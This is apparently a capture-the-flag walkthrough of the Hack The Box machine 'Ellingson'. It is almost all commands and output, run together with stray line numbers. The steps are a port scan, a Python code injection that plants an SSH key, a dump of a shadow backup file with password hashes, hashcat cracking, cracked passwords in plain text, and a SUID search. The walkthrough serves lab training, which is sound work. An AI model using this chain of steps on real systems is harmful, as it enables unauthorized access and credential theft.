HTB Ellingson Walkthrough
HTB Ellingson Walkthrough (Nanobyte)
1234567891011121314nmap -sV -sC -p- -oA ellingson.htb 10.10.10.139Starting Nmap 7.70 ( https://nmap.org ) at 2019-10-22 10:15 CDTNmap scan report for 10.10.10.139Host is up (0.066s latency).Not shown: 998 filtered portsPORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)80/tcp open http nginx 1.14.0 (Ubuntu)Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port ggressive OS guesses: Linux 3.10 - 4.11 (92%), Linux 3.2 - 4.9 (92%), Linux 3.18 (90%), Crestron XPanel control system (90%), Linux 3.16 (89%), ASUS RT-N56U WAP (Linux 3.4) (87%), Linux 3.1 (87%), Linux 3.2 (87%), HP P2000 G3 NAS device (87%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (87%)No exact OS matches for host (test conditions non-ideal).Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelOS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 16.92 seconds123456File "/opt/corp-web/run.py", line 32, in show_articlesslug = articles[index-1]>>> import getpass>>> print(getpass.getuser())hal123import osos.system("echo '\nssh-rsa [your RSA key]' >> /home/hal/.ssh/authorized_keys")1234567891011121314151617181920212223242526272829303132333435cat /var/backups/shadow.bakroot:*:17737:0:99999:7:::daemon:*:17737:0:99999:7:::bin:*:17737:0:99999:7:::sys:*:17737:0:99999:7:::sync:*:17737:0:99999:7:::games:*:17737:0:99999:7:::man:*:17737:0:99999:7:::lp:*:17737:0:99999:7:::mail:*:17737:0:99999:7:::news:*:17737:0:99999:7:::uucp:*:17737:0:99999:7:::proxy:*:17737:0:99999:7:::www-data:*:17737:0:99999:7:::backup:*:17737:0:99999:7:::list:*:17737:0:99999:7:::irc:*:17737:0:99999:7:::gnats:*:17737:0:99999:7:::nobody:*:17737:0:99999:7:::systemd-network:*:17737:0:99999:7:::systemd-resolve:*:17737:0:99999:7:::syslog:*:17737:0:99999:7:::messagebus:*:17737:0:99999:7:::_apt:*:17737:0:99999:7:::lxd:*:17737:0:99999:7:::uuidd:*:17737:0:99999:7:::dnsmasq:*:17737:0:99999:7:::landscape:*:17737:0:99999:7:::pollinate:*:17737:0:99999:7:::sshd:*:17737:0:99999:7:::theplague:$6$.5ef7Dajxto8Lz3u$Si5BDZZ81UxRCWEJbbQH9mBCdnuptj/aG6mqeu9UfeeSY7Ot9gp2wbQLTAJaahnlTrxN613L6Vner4tO1W.ot/:17964:0:99999:7:::hal:$6$UYTy.cHj$qGyl.fQ1PlXPllI4rbx6KM.lW6b3CJ.k32JxviVqCC2AJPpmybhsA8zPRf0/i92BTpOKtrWcqsFAcdSxEkee30:17964:0:99999:7:::margo:$6$Lv8rcvK8$la/ms1mYal7QDxbXUYiD7LAADl.yE4H7mUGF6eTlYaZ2DVPi9z1bDIzqGZFwWrPkRrB9G/kbd72poeAnyJL4c1:17964:0:99999:7:::duke:$6$bFjry0BT$OtPFpMfL/KuUZOafZalqHINNX/acVeIDiXXCPo9dPi1YHOp9AAAAnFTfEh.2AheGIvXMGMnEFl5DlTAbIzwYc/:17964:0:99999:7:::1234hashcat64.exe -m 1800 -a 0 ellingsin.txt rockyou.txt --forcetheplague:password123margo:iamgod$081234su margocat /home/margo/user.txtd0ff9e3f9da8--------------------123find / -perm -u=s -type f 2>/dev/null/usr/bin/garbageLast updated